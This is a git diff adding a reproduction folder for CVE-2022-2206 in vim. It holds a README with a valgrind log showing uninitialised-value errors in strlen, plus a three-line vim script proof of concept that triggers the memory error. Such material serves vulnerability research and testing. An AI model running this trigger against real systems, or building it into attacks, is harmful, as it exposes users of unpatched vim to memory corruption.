diff --git a/cve/vim/2022/CVE-2022-2206/README.md b/cve/vim/2022/CVE-2022-2206/README.md new file mode 100644 index 0000000000000000000000000000000000000000..8d8311a9f187b70f1823d0bdb6a2c26d550d2314 --- /dev/null +++ b/cve/vim/2022/CVE-2022-2206/README.md @@ -0,0 +1,55 @@ +### 漏洞复现 +```shell +$ valgrind vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa! +==20351== Memcheck, a memory error detector +==20351== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. +==20351== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info +==20351== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa! +==20351== +==20351== Conditional jump or move depends on uninitialised value(s) +==20351== at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) +==20351== by 0x207E42: ??? (in /usr/bin/vim.basic) +==20351== by 0x18FC57: ??? (in /usr/bin/vim.basic) +==20351== by 0x333989: ??? (in /usr/bin/vim.basic) +==20351== by 0x333BCC: ??? (in /usr/bin/vim.basic) +==20351== by 0x1EBA65: ??? (in /usr/bin/vim.basic) +==20351== by 0x1EBFEC: ??? (in /usr/bin/vim.basic) +==20351== by 0x176EED: ??? (in /usr/bin/vim.basic) +==20351== by 0x218EB5: ??? (in /usr/bin/vim.basic) +==20351== by 0x219F0F: ??? (in /usr/bin/vim.basic) +==20351== by 0x220CE5: ??? (in /usr/bin/vim.basic) +==20351== by 0x1A9554: ??? (in /usr/bin/vim.basic) +==20351== +==20351== Conditional jump or move depends on uninitialised value(s) +==20351== at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) +==20351== by 0x333545: ??? (in /usr/bin/vim.basic) +==20351== by 0x333922: ??? (in /usr/bin/vim.basic) +==20351== by 0x333BCC: ??? (in /usr/bin/vim.basic) +==20351== by 0x1EBA65: ??? (in /usr/bin/vim.basic) +==20351== by 0x1EBFEC: ??? (in /usr/bin/vim.basic) +==20351== by 0x176EED: ??? (in /usr/bin/vim.basic) +==20351== by 0x218EB5: ??? (in /usr/bin/vim.basic) +==20351== by 0x219F0F: ??? (in /usr/bin/vim.basic) +==20351== by 0x220CE5: ??? (in /usr/bin/vim.basic) +==20351== by 0x1A9554: ??? (in /usr/bin/vim.basic) +==20351== by 0x1A9717: ??? (in /usr/bin/vim.basic) +==20351== +==20351== +==20351== HEAP SUMMARY: +==20351== in use at exit: 100,874 bytes in 595 blocks +==20351== total heap usage: 1,630 allocs, 1,035 frees, 500,373 bytes allocated +==20351== +==20351== LEAK SUMMARY: +==20351== definitely lost: 0 bytes in 0 blocks +==20351== indirectly lost: 0 bytes in 0 blocks +==20351== possibly lost: 1,490 bytes in 25 blocks +==20351== still reachable: 99,384 bytes in 570 blocks +==20351== of which reachable via heuristic: +==20351== newarray : 1,536 bytes in 16 blocks +==20351== suppressed: 0 bytes in 0 blocks +==20351== Rerun with --leak-check=full to see details of leaked memory +==20351== +==20351== Use --track-origins=yes to see where uninitialised values come from +==20351== For lists of detected and suppressed errors, rerun with: -s +==20351== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) +``` \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-2206/poc_vim01.txt b/cve/vim/2022/CVE-2022-2206/poc_vim01.txt new file mode 100644 index 0000000000000000000000000000000000000000..78ffcefd5eee7ba79f6090c521e7b78600054111 --- /dev/null +++ b/cve/vim/2022/CVE-2022-2206/poc_vim01.txt @@ -0,0 +1,3 @@ +se encoding=iso8859 +sil!wi0 0 +sil0norm0o \ No newline at end of file